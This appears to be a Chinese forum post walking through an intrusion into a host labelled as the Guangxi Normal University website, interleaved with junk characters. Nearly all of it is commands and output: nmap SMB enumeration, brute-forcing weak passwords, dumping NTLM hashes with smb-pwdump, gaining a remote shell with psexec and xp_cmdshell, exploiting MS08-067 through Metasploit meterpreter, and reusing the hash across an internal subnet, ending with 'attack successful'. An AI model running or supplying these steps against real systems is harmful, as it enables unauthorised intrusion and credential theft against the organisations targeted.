广西师范网站http://202.103.242.241/. w( g8 D0 A& t
' {' Q1 t. q8 C
root@bt:~# nmap -sS -sV 202.103.242.241
6 Q/ S" j8 o: h. q+ Y& A* ]* w1 n4 b
' K. A3 [- Q* V% r% M- k1 ?/ J+ kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST$ c6 O+ W1 H5 o; M
1 u8 E2 B! }! H7 |7 cNmap scan report for bogon (202.103.242.241)
1 t& L: y! y. S+ b6 p
" N9 O% @1 j; n; q+ i; WHost is up (0.00048s latency).% y, Q8 @- r6 q( L
6 s- m6 f: |5 K% INot shown: 993 closed ports3 b* O( ^5 e& p! f' J$ \3 {. B. W
- l( ~$ X, `$ Y. ~& uPORT STATE SERVICE VERSION
9 T0 K, ]5 N: Y- Z5 h0 n
: E" \1 T6 ~. e+ F% b2 t) I135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 P5 ^- x/ S# n* u
- b! S0 [. w7 S
139/tcp open netbios-ssn
! U2 x+ K% X& {* C6 t( s" e0 n; x' Z0 }7 x) k" |* ^- ]7 V) P
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds& P) C3 }' C+ y2 A$ P
5 _$ V, \' P6 l! H/ I# Z2 z
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)6 o" i1 l' W, \9 E
; a% @9 n$ h5 \* A2 R" Y9 C1026/tcp open msrpc Microsoft Windows RPC; A/ [$ }# K1 p) I- q
* @# v3 T$ I+ B7 G
3372/tcp open msdtc?
/ ~4 A7 C' w( s9 }' [' x
' u: R6 ^, k' e! o: }. s3389/tcp open ms-term-serv?$ [+ _! g5 |6 o+ r8 V
) B6 ^4 G% x8 t& \: O( e, o/ a: q9 c
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
$ C, a6 w, B3 gSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r# E* D# ^9 `6 Y6 v
% X9 e5 @$ C. y. c7 g i
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions, q# z! _( K4 U" D& K
, [( e0 g4 V. O- g" R- E
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
5 K. A2 b) U1 N+ C# }0 M$ c/ m1 n
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO; {( J, }: ^6 K: _2 O8 \- E8 c
' g$ z$ c3 J3 ZSF:ptions,6,”hO\n\x000Z”);
' M5 s2 v* l7 @1 B O" g3 g0 v3 t/ v2 N5 Y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
' M& J P* x3 p) s8 w8 G
# R1 L" B( Q" h( i* {Service Info: OS: Windows
0 o5 D1 {/ f! u I
6 m2 Z1 D- P l& gService detection performed. Please report any incorrect results at http://nmap.org/submit/ . l- V& P0 G {& \ K
- U! y9 `9 ]$ O% s% U
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
7 c, E( |% k6 S W5 {, V/ m
( |0 e/ [4 W5 F w0 w0 v8 w9 Mroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
3 u3 T" n( H8 X0 z/ [. d
) W( l7 O0 i o: ^8 L5 X-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
+ V3 b) m$ |8 Q" M! k! Q( ~* i$ s' N# O5 q+ m
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
& s8 h; ]) X: D9 f* g8 G
9 G% s: ?- I+ R f/ V, V8 D+ U-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse3 J/ W: _: n6 B3 \/ l, c7 P: Z
" Y9 O$ Y% C. d7 L* b8 W-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse d I n3 s2 s* Q7 I6 @ p) k5 l
' L; U8 v/ _. ^! U1 H7 {; l& |; B' c+ K" D
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
. x- K5 J8 h9 {6 b, y8 O; z( L, O+ n5 b" b# T
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse" i# \9 ]& _& s/ p; J Y& {
$ u$ Y$ E0 P; F9 `2 f-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
* U& J/ g2 |, a3 r$ K& q+ G; Z2 P6 P% Z$ { R
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse7 z( \) D# L0 E( u6 Z. b
, a9 m( V6 v$ u/ ]& T/ r8 ~-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse( L3 t5 t: c5 J8 ~1 O0 Q
) u c c# R6 |6 h; N( M) a
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse9 z2 l; Z2 T% x" u0 E
# }0 b( a! t$ I" @-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse; J: k) k0 q) c# C( i
8 O" Z: G6 Q! A! i+ P-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
% Q! j8 J4 R% |, T2 i4 M& U- \+ z4 o0 u+ M
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
7 o' F" E, x3 h0 Q% N/ N7 ? R5 ]0 C; L: x/ S1 I
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
* ]5 ~( ?; O! H3 E# k) b/ \6 [ H1 B) `* P, r6 H3 g- W$ m
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
) l0 Z0 [ d: ~! f" W
( {" D4 E* i2 j: A$ n8 mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 * S, ]2 |* L" q$ f
# e6 _0 p' P- A1 c; w
//此乃使用脚本扫描远程机器所存在的账户名
0 z0 u, A/ t! _! ~& J. z& v0 t7 \1 a3 S# E7 ]; O
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
, ]9 C) G/ ?3 x7 u1 ~; t
- F# N7 b6 S, p* B! E7 uNmap scan report for bogon (202.103.242.241): a. d+ A8 t9 m) D; U
: X3 m* Q9 d$ L; ]Host is up (0.00038s latency).
6 x) I9 A# A$ x) |7 X- }# ^2 g
( P, D) |9 |8 K% d- b% M( w% [Not shown: 993 closed ports6 ~* ?0 Z! n$ \$ a4 v
) O4 r/ N7 W1 H: ePORT STATE SERVICE
( R( m+ X9 y: k8 d3 b2 Q n P
3 e/ ^! ]# v; W0 s. j1 m135/tcp open msrpc
+ n! _& {: x: S7 T6 l
; Y( X2 M; [+ p/ ~$ ]139/tcp open netbios-ssn
/ g }' N- N* J$ M: ]
1 W6 S: P T7 ~& X6 b445/tcp open microsoft-ds
' c' h1 b y& ~8 J# i- X" I' J6 X/ |- b8 o7 r2 v( ~
1025/tcp open NFS-or-IIS
+ a/ ]& m6 ~4 |" M- M. G) N6 \/ }4 G3 t& x9 ]7 y
1026/tcp open LSA-or-nterm
: |5 R$ Z" `+ n6 S/ A- e6 I! u
3372/tcp open msdtc6 A5 v# h/ Y1 s9 B
- z( Z$ U E. |9 z5 |& q8 m
3389/tcp open ms-term-serv
9 X3 p: h1 r' ?, t h' L" @) Z& N' R: E: i. d, ^1 O$ u6 S) t
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)* a6 J: X2 m( {9 u1 r3 T5 l% l
( W6 U) P3 M, N/ f! I- wHost script results:
2 K* W. h+ q6 W4 o8 q
8 o0 z: E2 \, ?% t: X1 S| smb-enum-users:
& D8 s4 r- J$ c4 K
: f3 d+ J) r+ v) K- `|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果1 X- E' i7 ~, v0 D" @5 [
. G& \; C$ n8 P7 Y& m P: Q1 S& cNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
* q3 r: R! y* g+ X9 Y0 q! u9 w" t/ j p& _ I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
% `* H8 t1 e. _# a d
b4 J: _* {% |0 b//查看共享2 W! L& k, r2 C: \2 A c
" q7 n; y0 N( r2 b$ y/ i* o! h t, C
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST: K! E+ ^% w2 R, z
1 b! m/ H8 S, U- c% w
Nmap scan report for bogon (202.103.242.241)
1 M1 p }3 H; ^' q3 L& a+ u
/ M3 e3 J" ?8 ?% _- s& V) p+ Z5 @( U5 SHost is up (0.00035s latency).1 V2 U9 k: a2 C$ D( l
7 O( ~, q% p- Q; H! Q7 rNot shown: 993 closed ports
8 ?/ h8 t4 ^1 \' d6 u; h# k" f q% G2 c
PORT STATE SERVICE! u7 j6 k8 l' I O3 E
! i9 O6 j9 Q4 d4 E/ h$ p135/tcp open msrpc
8 m' C C8 K8 Y/ l" y
9 @7 Z: a$ ]0 `139/tcp open netbios-ssn
) [) G% p/ N W* T# ^( O R6 s+ L! Q. E
445/tcp open microsoft-ds" a/ }- h+ Y/ C% m& b8 q% h" j% f% F
6 ^4 Y" M/ D. r; M
1025/tcp open NFS-or-IIS% P/ g m' o4 O& D7 V) d) j4 d% b
9 d- _: b* i9 A4 ?: ~% {
1026/tcp open LSA-or-nterm# ]' s6 x) w! B. v
/ P; r. z2 }% [; v# g) ]3372/tcp open msdtc& M: h5 [ z: Q" z2 G E9 w% F6 ?
4 r: o+ u7 _4 G6 V/ I0 i) u
3389/tcp open ms-term-serv
- G) H9 c! P( W( w" _5 b+ T7 K
0 o5 X% B. [* xMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
" S+ h8 ~/ Z$ w/ Z) E, x4 ~; k# f9 g! A' z
Host script results:9 @! g6 J" t* U/ Y$ P# U
% O/ o( O7 v; ]; J1 \: n4 l+ C1 k| smb-enum-shares:7 r9 [+ }+ K: ~$ m
! J# K' c$ _7 n6 M7 M+ w
| ADMIN$
; b0 e% Y1 f j. X2 J% x0 O- ?# ]6 N' M& h0 R8 z
| Anonymous access: <none>7 \+ g! h4 ] H& s2 I
- }% D3 P# [( T7 \% u. K5 y$ e
| C$: N- N; i/ ]2 G" e
6 f; ~7 r, |! p* B: n% p
| Anonymous access: <none>2 r5 q. Z' J; [" M4 \! A6 k# h( c
9 x0 _% [: G! I( k
| IPC$
# Z v# K8 W$ Q
' F" G$ N( ]) A7 x, c|_ Anonymous access: READ
2 `) d1 Z% Z8 ^. X! ?! r2 U1 J2 f, l7 }) u9 ?; |' M
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds- L! J, ]6 B6 V! w/ p
1 q' o0 ]/ g: `root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
) \8 U+ H# E; {) J/ N1 w* g" [4 r4 ~, P9 j; B% V2 r' b
//获取用户密码, P# U9 I- l1 q: E
/ C& l# [/ L' K4 \$ DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST1 d3 v4 u9 b8 X; G0 l
8 g2 _5 _- _& I: F6 a, ?! f7 xNmap scan report for bogon (202.103.242.2418)0 ~. K+ ?! D, y- k1 t& e; B7 f
: O8 L% F7 b& pHost is up (0.00041s latency).8 u( U3 z) R0 j+ R
- c' y$ F8 f& rNot shown: 993 closed ports8 E+ O( J* k# Q( z; Q% T* ?
$ c- y! m/ T: X# hPORT STATE SERVICE
: E* y+ @* {* p" n( i- ]
: k. |" t: C, m, p135/tcp open msrpc
, I3 c' p9 M) a2 W' z- A/ P. U# i
139/tcp open netbios-ssn) |( Q" E0 P( ]/ V+ K! o0 }0 D
) T; O6 l. R9 _, `# N" A, r. d$ e% L
445/tcp open microsoft-ds
$ R3 W+ j' M# g- V! y* i: A0 ]6 P5 ~7 n/ _1 Z- J
1025/tcp open NFS-or-IIS
7 o2 ~: T& a* o5 Q. l) ], d( m( o# u% X4 e, a/ L
1026/tcp open LSA-or-nterm, `9 x; Q; H1 B' j
' d# x* I; T* m8 P3372/tcp open msdtc
, p2 q8 | z6 W2 k0 `& ~2 l6 N8 o- ~: C$ I6 b2 O- _
3389/tcp open ms-term-serv
0 p' d( E) S! @' ~; h* N$ [+ k% ]
, N' d- O% Z- r7 v; H8 AMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)! }& S1 E) o& [
F! {2 f2 |5 {& k$ ?% ^
Host script results:+ X/ S. G& p4 t; d
# ?. B: v2 |7 v, x; X| smb-brute:
" k8 O0 m/ H6 C& P5 g& ~4 A, p' B- o- t+ P9 z
administrator:<blank> => Login was successful
' ?- J% e2 x; c9 u0 h4 e, E K6 C+ X+ P0 i }4 U; s
|_ test:123456 => Login was successful( ~) Y- x. `+ e Q7 c8 U
h- z5 y4 O! Y% p% ZNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 l2 H: \+ h# O2 L
O% X5 H& M% c2 F6 C8 f5 p7 Oroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash8 s# w' \* [8 u# W) X% ]
. G9 @ F# E/ B
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data+ r( X! @1 g7 J- ^
5 {) p6 |5 M( B F; ~
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse$ W0 X' i: N9 A: w8 _1 v% n1 Z
; m& F& v' o1 h& p0 Xroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
4 ~2 J0 `4 O# o! G N0 o! z; d4 \- L3 R2 ~: |& P4 \5 O
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST6 c" w- `! j& ^
; Y6 q2 O+ }. ?8 eNmap scan report for bogon (202.103.242.241)
/ u) d5 d; w6 S( \/ e# W. s
5 k- z" l! I7 h+ b2 f3 z. YHost is up (0.0012s latency).. m" C* D. }! Z8 y% d6 X
6 q2 n8 v" g8 R4 n: c) e3 rPORT STATE SERVICE5 }) t* d0 x* w' p( d: K2 y
$ W* L* @2 m" `, Y$ x135/tcp open msrpc e. D4 c, D' F
/ E' V% v8 g& N2 [7 {139/tcp open netbios-ssn
1 ^" T9 V' n# ^# N) }5 w% I
" q- p5 _1 h+ D5 `, O: Y445/tcp open microsoft-ds% M& C7 k% Y5 p: z
6 H) X* X/ c9 v: t5 h
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
6 @2 s: C* R8 u& ]1 N/ k0 q2 l7 F G& m/ G b( N
Host script results:
$ d* ]/ K" }0 h2 g( |! {# S# U8 q" e5 j* c1 W1 _
| smb-pwdump:- n7 Y; G# `$ b& @: F
, w* A) V# r4 N3 U; E7 H& F' ~; d| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************3 \) p+ g) ^, R6 G7 ?( M
9 K# _! V& Y+ U R; o: K6 y- g/ V
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
: y- O% y& N1 Q; _$ {
+ o% ~7 y6 Z0 H2 \0 x| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
$ ~0 ?1 E0 m' _* G" g2 J; P5 `8 w0 a+ m- B$ A9 H; Y3 u' Y8 s5 F
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
6 n0 R3 V1 S) A8 z
. w' h, l9 h5 }; D N z+ Q! [' [6 NNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
7 j) W( A6 P& Y& N# b4 O3 Q, c9 y' {; z& v$ w$ s5 D# s5 Y
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell/ U* f! N0 J5 p+ _. o* I7 Z
5 b& V. y% }; f( q5 K-p 123456 -e cmd.exe
9 d, h: n z- _7 s) r$ \8 _! q/ T1 X4 [; V3 [' z
PsExec v1.55 – Execute processes remotely
: G! m! a! O* B. m) u/ o6 I7 l
) |! ]* Z- s1 d: t3 Z. lCopyright (C) 2001-2004 Mark Russinovich
`% \! H. _5 c' P [$ e0 p# y G# p/ C, t; E5 P
Sysinternals – www.sysinternals.com
6 m! b4 [: e5 O3 h: B
0 i& P4 l( e7 x+ S9 [Microsoft Windows 2000 [Version 5.00.2195]7 D: j" h( E# I7 R! h- }
- U$ b# }# H0 H6 `% @1 b5 N7 T) d(C) 版权所有 1985-2000 Microsoft Corp.
' A9 X/ w- _# ?1 h2 Y9 _4 ~% y' q
1 k$ V8 `7 l0 u$ dC:\WINNT\system32>ipconfig6 C4 u# q0 f: [/ }' Y0 y8 p* H! k5 R
* M Y/ Z- ~ K9 v" |( {: K
Windows 2000 IP Configuration
) t0 \+ y2 q$ @' a9 F$ g) g) b
' J# P {" g0 ?2 MEthernet adapter 本地连接:" D6 a- |, s3 C& {+ h8 v1 s, b3 b+ k
6 T6 g6 p: i" J/ l# H( IConnection-specific DNS Suffix . :
2 e) _, r! y& ^! y1 _" O! F% f: [. x" r/ F; |" ~
IP Address. . . . . . . . . . . . : 202.103.242.241# |$ ?! l/ A" X F6 S
6 M5 Z! Z2 X$ _4 j. O2 eSubnet Mask . . . . . . . . . . . : 255.255.255.0
1 [$ ~ {& O! @$ J' q/ F; S7 d. F4 z. o6 _' d) X7 @
Default Gateway . . . . . . . . . : 202.103.1.1 k5 _& O( W; o/ j2 v$ t
4 ]- c) x6 q3 n
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令& e+ P2 ^" r6 ^' T8 q
k2 z9 U5 [7 i7 U% }- {root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
4 A. d( J% s) d' X7 u
3 U5 ?2 `* J) B' F7 DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
# I% M- B, m8 m3 ^4 B8 B2 s
6 k) N3 f: e) Y8 e5 ?% D/ z' cNmap scan report for bogon (202.103.242.241); k; N( ]& e+ a1 n) X
6 {1 C1 W4 o$ Y- j& e D
Host is up (0.00046s latency).
3 _( q) f6 f' R1 @/ {$ D& O6 j8 G4 d8 D' O
Not shown: 993 closed ports
4 E2 O. {( T; l& `9 z+ [/ f# t* A7 l% K# S% O
PORT STATE SERVICE- J2 d0 v8 d1 T- y0 f
: X" Z \2 L# j) _1 |0 r
135/tcp open msrpc* Q* b f: p2 [9 G& ^6 {. Z
G2 y7 T/ k& Y1 c; J7 U139/tcp open netbios-ssn
2 p/ V6 K3 e0 C1 p4 I# h# G' k) U' w" N2 _; W0 t
445/tcp open microsoft-ds
- k( `3 N6 N! }6 K
2 K; @; r" D% J# e* K1025/tcp open NFS-or-IIS
, n b4 a) e! R; H3 I. N, z& N* {) Q3 ]
1026/tcp open LSA-or-nterm" _! _3 D0 `1 y0 X
" `& G& ]' {9 N4 @ \" C/ S
3372/tcp open msdtc
/ ^& l8 H. _5 w: P- }- t4 R% Y
- v) Q5 L3 P9 J3389/tcp open ms-term-serv
8 P+ u, z9 S `+ D2 P) N+ I
: e6 v6 l0 o6 D0 S* m, f1 PMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)) t8 A! [( @$ k
% i! m9 h. T9 o
Host script results:/ v7 t. C/ c" ~; V- g+ V8 o
( T& e# r' R) Y2 M4 l& k| smb-check-vulns:
9 c, y- }5 L1 n' f S; W# u- c6 h3 P; z, B$ S) `: a
|_ MS08-067: VULNERABLE9 J: O; Z7 v* g3 p4 k' Y& B" E
$ e1 q: I' _7 R" K: v
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
, d* h% n% q, c) k1 R
( ~& `% p* N! \, nroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出2 A. n5 t4 P( I* G
; q% f: K+ R) @* y1 ~msf > search ms082 o6 o& q3 j, g$ E+ R+ |" A# V1 N
/ p3 F/ I& _) x1 E. a2 @6 Z
msf > use exploit/windows/smb/ms08_067_netapi
! h# y9 C4 u1 v9 M
* i% S8 _/ V Q( c8 `msf exploit(ms08_067_netapi) > show options
; i' Z" Q4 v1 i) Z! c+ V
7 K( t9 H9 }+ z3 o$ E5 n1 t& a' Bmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
" q7 ?9 l1 r% t' Y! Y9 p" u% G) V6 L. A/ q* _9 O- x+ r; T) ?% F
msf exploit(ms08_067_netapi) > show payloads
; e. i& j3 C8 k% C& u/ `# ^6 E( W- {1 F5 d2 ~- W
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp ~ p- v. I+ J% u# A
+ f0 c# \; M/ n$ {' v/ @* U
msf exploit(ms08_067_netapi) > exploit
" i. x$ M# v: @9 i z+ L, n+ X3 |1 ]! I* \4 X- p" }9 _
meterpreter >
5 I/ R( G$ ]% y: V
# b) ]& {4 W* e/ v5 ]- ^Background session 2? [y/N] (ctrl+z)4 y" q5 |* L3 G* W3 a& \
. X9 Y% j( `6 x: J4 l! X3 G/ Lmsf exploit(ms08_067_netapi) > sessions -l! A- `& `7 V) c R$ J( y- J) X6 z# k
% P8 |8 K! o& x0 I8 @3 ^% g oroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
. Z# F* r) R4 f; }$ t. c' [& }( r3 c/ l# R) X
test
; i4 ]: Z1 u) w7 |$ x
# w) t1 I7 q8 eadministrator
1 {% V5 A a( |2 l1 h* p8 x& J5 d5 k B( I
root@bt:/usr/local/share/nmap/scripts# vim password.txt
Q9 c2 H3 u1 }9 P! a0 q$ W
9 B7 L$ X f# y X8 o. b44EFCE164AB921CAAAD3B435B51404EE
) M1 o7 M2 r2 p9 {/ _/ e! B* b( d* Q0 ^$ C, ~; { _& t
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 7 d: @5 ?( |& S9 J# D3 [
, H- _6 O# V4 O& ~ //利用用户名跟获取的hash尝试对整段内网进行登录
+ A7 a3 t7 a. Z$ W) J. w6 @# W% t
/ u5 x0 G. f! jNmap scan report for 192.168.1.105
: h: I- x8 _. y1 ^# a7 E
0 P. v+ u1 M; S% a" yHost is up (0.00088s latency).
6 A5 R2 I! G& o7 P% M2 h
% V- h9 [ E- a" d4 J b @Not shown: 993 closed ports& x+ p5 x7 Z4 F
& Y X. b- F& J+ w$ h! n0 _0 V
PORT STATE SERVICE
; s/ B' o; G4 D$ C- F F$ T/ G9 X* i7 D7 ?6 q- r
135/tcp open msrpc
' k# R7 w! `3 @0 @, W! `1 L1 q4 Y" a/ t
: K' n; Z% [: `3 H. C139/tcp open netbios-ssn
) A* t- f2 H$ \
6 i! f* O" @9 t6 N4 U" G445/tcp open microsoft-ds9 g1 u# Z% x' N
* K6 u! N9 A( s! ]; d8 R1025/tcp open NFS-or-IIS
, m- V o3 r! T' ~6 G* j' [
- ?8 C4 I3 ?, |9 z2 r, c( G1026/tcp open LSA-or-nterm% a4 ` K8 X, g8 h6 `9 i
1 b2 W/ b, v, W3 B8 O& G- L- O5 H3372/tcp open msdtc q( D. ]4 y. O& j6 k* u' N# s& Y9 V
. E% j& Z8 D8 O7 q$ t2 A3389/tcp open ms-term-serv
( g( G+ x7 S( D$ x
- {( |# \ W" b8 {+ OMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 Y" R- ]) r- ], @, A
) U M" @7 } U8 GHost script results:
4 X) o% k. o4 u; i: d3 z
/ W/ C; u8 b6 ], S/ {| smb-brute:* a% ^% b" g. y, s3 b; c/ o
7 @0 n' l6 y9 Q+ ? z# C3 V
|_ administrator:<blank> => Login was successful
, G) ]$ \# M' @; T) c$ |$ ~' W
' Y+ }& _8 D( }! p7 N$ D攻击成功,一个简单的msf+nmap攻击~~·1 @1 x) i* ~, O/ u: V
1 B0 r D5 ^5 K W |